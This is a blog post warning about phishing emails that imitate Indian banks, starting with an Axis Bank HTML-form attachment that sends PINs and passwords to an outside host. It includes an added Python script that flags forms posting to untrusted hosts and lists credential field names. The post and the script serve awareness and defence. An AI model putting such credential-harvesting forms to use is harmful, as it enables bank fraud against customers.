This morning was going about as usual till I noticed an email. It seemed to originate from Axis Bank, it had an HTML attachment, and it was an important announcement.
The contents of the email looked valid considering the Government of India had placed a ban on the sending of bulk SMS till the 29th. Now I am not sure if such a ban holds good for financial institutions. But some smart bloke seems to have capitalized on this ban. The email stated that:
Now, unlike the other phishing emails that I have encountered, this one seemed different, and the content (read: grammar) also looks more in line with a professional agency and in tandem with the events that are happening in India.
This is the snapshot of the email:
I opened the HTML attachment after a customary scan from AV. Although this looks authentic, it is a bit suspicious because it is asking for too many private details, which should evoke second thoughts from anybody. Generally any phishing attack would ask for username, password and CVV details at the max. But this one is prompting for ATM PIN, Transaction password, Secure Code/Verified by Visa and Email details. And unlike others where you enter the details on a site, it is sending an attachment to be filled and submitted. The modus operandi is slightly different.
I bet someone who is familiar with Axis Bank’s online transaction mechanism has set this up, because Axis Bank requires a transaction password in addition to the details mentioned above for an online transaction. Now, the form is an HTML attachment, and when you open it everything looks authentic; just take a look below.
This is it, but once you look at the page source carefully you will realize the bait. Using the POST method, all details would go to the URL specified instead of Axis bank:
A Whois lookup for the domain above lists it as based out of Poland. All I can do is just notify Axis Bank of this. It would have been better if the Government of India or the financial institutions had made it clear whether their services would continue to operate or be impeded due to this SMS ban.
Take care and please spread the word to ensure people do not fall for this.
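The page-source check described above can be automated for HTML attachments. The following is an added example, not part of the original post: it lists every form in an attachment whose POST target is outside an allowlist of the bank's own domains, along with the sensitive fields it asks for. The domains `bank.example` and `collector.example`, the field names and the keyword list are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed keyword list: details a bank does not ask for by e-mail.
SENSITIVE = ("pin", "password", "passwd", "cvv", "securecode", "vbv")

class FormAudit(HTMLParser):
    """Collects each <form>'s method/action and the input names inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", "").strip(),
                               "method": a.get("method", "get").lower(), "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms:
            self.forms[-1]["fields"].append(a.get("name", "").lower())

def host_trusted(host, trusted):
    """True only for an exact match or a real subdomain of a trusted domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in trusted)

def audit_attachment(html, trusted):
    """Return one finding per form that would send data to an untrusted host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if host_trusted(host, trusted):
            continue
        asked = sorted(f for f in form["fields"] if any(k in f for k in SENSITIVE))
        findings.append({"post_host": host or "(none)",
                         "method": form["method"], "sensitive_fields": asked})
    return findings

# Constructed sample: a form that posts to a host other than the bank's.
SAMPLE = """<form method="POST" action="http://collector.example/save.php">
<input name="userid"><input name="atm_pin" type="password">
<input name="transaction_password" type="password"><input name="cvv">
<input name="email"></form>"""

if __name__ == "__main__":
    print(audit_attachment(SAMPLE, {"bank.example"}))
```

The suffix match requires a leading dot, so a lookalike host such as `bank.example.collector.example` is still reported as untrusted.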
UPDATE:
I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!
11 October
Received another phishing email with a similar modus operandi, this time targeting ICICI Bank and hosted at:
17th October
Another day, another phishing email. The phishers are just not leaving any stone unturned as they target every bank with an online presence, this time targeting customers of HDFC Bank and hosted at:
Here is the Phished URL:
Oh wait... I think I just saw a similar email targeting Punjab National Bank’s customers land in my inbox!
Can you please share the details? I am an LEO (Law Enforcement Officer). Our unit deals with similar crime. Maybe we would be able to pass this info to our counterparts in Poland, after we have prima facie found it to be a phishing attack. Can you forward the mail to the address mentioned above?
Forwarding the email will lose all its headers, rendering it useless. If the headers could be extracted and sent, we could try to see where the email originated from.
Of course it’s possible to retrieve the header and forward it. Just like the random domains used for hosting such phishing sites, the IP addresses used for sending such emails also change rapidly with time. According to Fraudwatch, the average uptime of a phishing site is 52 hours only!
Nice to finally find some decent writing in this sea of mediocrity! Thanks for taking the time to post.
Nicely said. Have tweeted.
Thanks for the excellent post. I love reading it!
Your blog is exactly what I’ve been trying to get. It’s a very enlightening read. If every blogger would be as visitor specific as you, life could be so much easier.
I am not sure where you’re getting your info, but great topic. I need to spend some time learning much more or understanding more. Thanks for the great information; I was looking for this information for my mission.
I wish more people would write blogs like this that are really fun to read. With all the fluff floating around on the net, it is rare to read a blog like this instead.
Another excellent publish on running a blog! Thanks therefore much to take the time to share a person data as well as knowledge with other bloggers.